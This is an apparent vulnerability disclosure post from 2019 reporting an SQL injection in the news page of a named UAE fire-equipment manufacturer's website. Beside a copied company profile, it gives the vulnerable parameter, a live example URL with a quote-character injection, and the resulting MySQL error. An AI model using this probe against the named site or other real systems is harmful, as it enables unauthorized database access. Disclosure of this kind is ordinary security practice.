Fire King SQLi

2019.09.11
ir H.BBF3.4 (IR) ir
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title:Fire King SQLi # Date: 10 Sep 2019 # Author: H.BBF3.4 & A.BBF3.4 +++++++++++++++++++++++++ About fire king RAK factory for firefighting equipment (Fire King) LLC Specialized for the production and manufacturing of all firefighting equipment and alarm systems. It was established at the emirate of Ras Al Khaimah, United Arab of Emirates on the year of 2011. Under the industrial permit no.06125711. Since the early beginning, we were keen to be one of the leaders in this industry, through the products with high quality and the premium service we are offering. The factory consists of two production lines, the first for firefighting equipment, including fire extinguishers with different sizes and types, fire hoses, pumps with different sizes, and hose reel cabinets with different sizes. The second line specialized in fire alarm, sprinklers, CO2, and FM200 systems. We have relied on specialized engineering team with experience in the field of fire fighting, and on reliable sources for raw materials and components that essential for production using the elite European brands, according to the BS and other international standards. The company staffs are working according to ISO 9001 in all divisions, and activities. Through our hard work and dedicated work we have achieved breakthrough in all GCC countries, Iraq, Egypt, and some other African countries. ++++++++++++++++++++++++++ # SQL Injection Exploit : ********************** /news.php?id=[SQL Injection] # Example Vulnerable Sites : ************************* [+] http://fireking.ae/news.php?id=3%27 # Example SQL Database Error : **************************** You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and page_status=1' at line 1


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top